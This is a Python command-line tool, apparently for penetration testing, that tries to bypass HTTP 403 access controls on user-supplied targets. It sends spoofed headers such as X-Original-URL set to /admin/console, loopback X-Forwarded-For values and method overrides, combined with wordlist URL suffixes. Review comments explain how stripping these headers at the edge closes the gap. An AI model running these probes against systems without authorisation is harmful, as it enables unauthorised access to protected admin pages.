import argparse
import concurrent.futures
import json
import sys
from colorama import Fore, Style
from fake_useragent import UserAgent
import requests
def read_wordlist(wordlist):
    """Load a wordlist file as a list of whitespace-stripped lines.

    Every line of the file is kept, including blank ones, which become
    empty strings. If the file does not exist, the error is printed and
    the process exits with status 1.
    """
    try:
        with open(wordlist, "r") as handle:
            entries = list(map(str.strip, handle))
    except FileNotFoundError as fnf_err:
        print(f"FileNotFoundError: {fnf_err}")
        sys.exit(1)
    return entries
def get_headers(path=None, method="GET"):
    """Build the list of header sets sent with each probe request.

    Every set holds exactly two entries, in this order: a ``User-Agent``
    read from ``fake_useragent`` (``ua.chrome`` is accessed once per set)
    and a single header under test. ``do_request`` reports the last item of
    a set, so that ordering matters.

    The headers under test carry a loopback address, an alternate URL or
    host, or a method override. They only have an effect when something in
    the request path (reverse proxy, WAF, framework middleware) honours them
    on requests from untrusted clients; stripping or overwriting them at the
    trusted edge closes that gap.

    ``path`` fills the two rewrite headers that follow the requested path
    (``"/"`` when falsy); ``method`` fills ``X-HTTP-Method-Override``.
    """
    ua = UserAgent()
    rewrite_target = path or "/"
    # (header name, value) pairs, kept in the original order.
    probes = [
        ("X-Original-URL", rewrite_target),
        ("X-Custom-IP-Authorization", "127.0.0.1"),
        ("X-Forwarded-For", "http://127.0.0.1"),
        ("X-Forwarded-For", "127.0.0.1:80"),
        ("X-Originally-Forwarded-For", "127.0.0.1"),
        ("X-Originating-", "http://127.0.0.1"),
        ("X-Originating-IP", "127.0.0.1"),
        ("True-Client-IP", "127.0.0.1"),
        ("X-WAP-Profile", "127.0.0.1"),
        ("X-Arbitrary", "http://127.0.0.1"),
        ("X-HTTP-DestinationURL", "http://127.0.0.1"),
        ("X-Forwarded-Proto", "http://127.0.0.1"),
        ("Destination", "127.0.0.1"),
        ("X-Remote-IP", "127.0.0.1"),
        ("X-Client-IP", "http://127.0.0.1"),
        ("X-Host", "http://127.0.0.1"),
        ("X-Forwarded-Host", "http://127.0.0.1"),
        ("X-ProxyUser-Ip", "127.0.0.1"),
        ("X-rewrite-url", rewrite_target),
        ("X-Original-URL", "/admin/console"),
        ("X-Rewrite-URL", "/admin/console"),
        ("Cluster-Client-IP", "127.0.0.1"),
        ("X-HTTP-Method-Override", method),
    ]
    return [{"User-Agent": str(ua.chrome), name: value} for name, value in probes]
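def do_request(url, stream=False, path=None, method="GET", timeout=10):
    """Send one request per header set from ``get_headers`` and report hits.

    A response is reported when its status is 200 (green) or >= 500 (red).
    The report line holds the URL, the header under test (the last item of
    the header set, as JSON) and the status code. It is appended to the file
    named by the module-level ``output_file`` when that is set, otherwise
    printed.

    NOTE(review): responses are not compared against a request sent without
    the header, so a 200 here does not by itself show that an access control
    decision changed; confirm against a header-less baseline when triaging.

    Args:
        url: Full URL to request.
        stream: Passed through to ``requests`` as ``stream``.
        path: Forwarded to ``get_headers`` for the URL-rewrite headers.
        method: HTTP method used for the request and the override header.
        timeout: Seconds to wait on the server; without it a silent host
            blocks the whole run indefinitely.

    The first ``RequestException`` ends the loop for this URL; it is printed,
    not raised.
    """
    headers = get_headers(path=path, method=method)
    # output_file is assigned only in the ``__main__`` block; look it up
    # defensively so that importing this module and calling do_request()
    # does not raise NameError.
    report_path = globals().get("output_file")
    try:
        for header in headers:
            # The context manager releases the connection even when
            # stream=True and the body is never read.
            with requests.request(
                method, url, stream=bool(stream), headers=header, timeout=timeout
            ) as r:
                status = r.status_code
            if status == 200 or status >= 500:
                status_color = Fore.GREEN if status == 200 else Fore.RED
                # The line keeps its colour escape sequences even when it is
                # written to a file.
                output_line = f"{Fore.WHITE}{url} {json.dumps(list(header.items())[-1])} {status_color}[{status}]{Style.RESET_ALL}"
                if report_path:
                    with open(report_path, "a") as f:
                        f.write(output_line + "\n")
                else:
                    print(output_line)
    except requests.exceptions.RequestException as err:
        print("Some Ambiguous Exception:", err)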
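def _probe_all(bases, suffixes, path, **request_kwargs):
    """Call do_request for every base/suffix pair, inserting ``/path`` when given."""
    for base in bases:
        for suffix in suffixes:
            if path:
                do_request(f"{base}/{path}{suffix}", path=path, **request_kwargs)
            else:
                do_request(f"{base}{suffix}", **request_kwargs)


def main(args):
    """Run the checks selected on the command line.

    ``bypasses.txt`` (relative to the working directory) supplies the URL
    suffixes. ``args.domains`` or, failing that, ``args.file`` names a list
    of base URLs that are requested with ``stream=True``. ``args.target`` is
    handled independently of those two and is requested once per HTTP
    method. When ``args.path`` is set it is inserted between base and suffix
    and forwarded to ``do_request``.
    """
    wordlist = read_wordlist("bypasses.txt")
    if args.domains:
        print(Fore.CYAN + "Checking domains to bypass....")
        _probe_all(read_wordlist(args.domains), wordlist, args.path, stream=True)
    elif args.file:
        print(Fore.CYAN + "Checking endpoints to bypass....")
        _probe_all(read_wordlist(args.file), wordlist, args.path, stream=True)
    if args.target:
        print(Fore.GREEN + f"Checking {args.target}...")
        # http_methods is not defined anywhere in the visible file, so the
        # original loop raised NameError as soon as --target was used. Use a
        # module-level http_methods if one exists, otherwise fall back to the
        # method do_request already defaults to.
        methods = globals().get("http_methods", ("GET",))
        for method in methods:
            _probe_all([args.target], wordlist, args.path, method=method)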
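if __name__ == "__main__":
    # The banner lines stay at column 0: they are the content of the raw string.
    banner = r"""
___________ ___. .__ .___ .___
\_ _____/_________\_ |__ |__| __| _/__| _/____ ____
| __)/ _ \_ __ \ __ \| |/ __ |/ __ |/ __ \ / \
| \( <_> ) | \/ \_\ \ / /_/ / /_/ \ ___/| | \
\___ / \____/|__| |___ /__\____ \____ |\___ >___| /
\/ \/ \/ \/ \/ \/ v0.04
"""
    print(Fore.CYAN + banner)
    parser = argparse.ArgumentParser()
    # --path is a modifier that main() combines with --domains, --file or
    # --target. It used to sit in the mutually exclusive group with -d/-f,
    # so argparse rejected exactly the combinations main() has branches for.
    parser.add_argument(
        "-p", "--path", action="store", help="add a path to bypass", metavar="path"
    )
    # main() treats --domains and --file as alternatives (if/elif).
    source_group = parser.add_mutually_exclusive_group()
    source_group.add_argument(
        "-d", "--domains", action="store", help="check a list of domains to bypass"
    )
    source_group.add_argument(
        "-f", "--file", action="store", help="check a list of endpoints to bypass"
    )
    parser.add_argument(
        "-t", "--target", action="store", help="single target to check", metavar="target"
    )
    parser.add_argument(
        "-o", "--output", action="store", help="output file path", metavar="output.txt"
    )
    args = parser.parse_args()
    # do_request() reads this module-level name to decide where results go.
    output_file = args.output
    main(args)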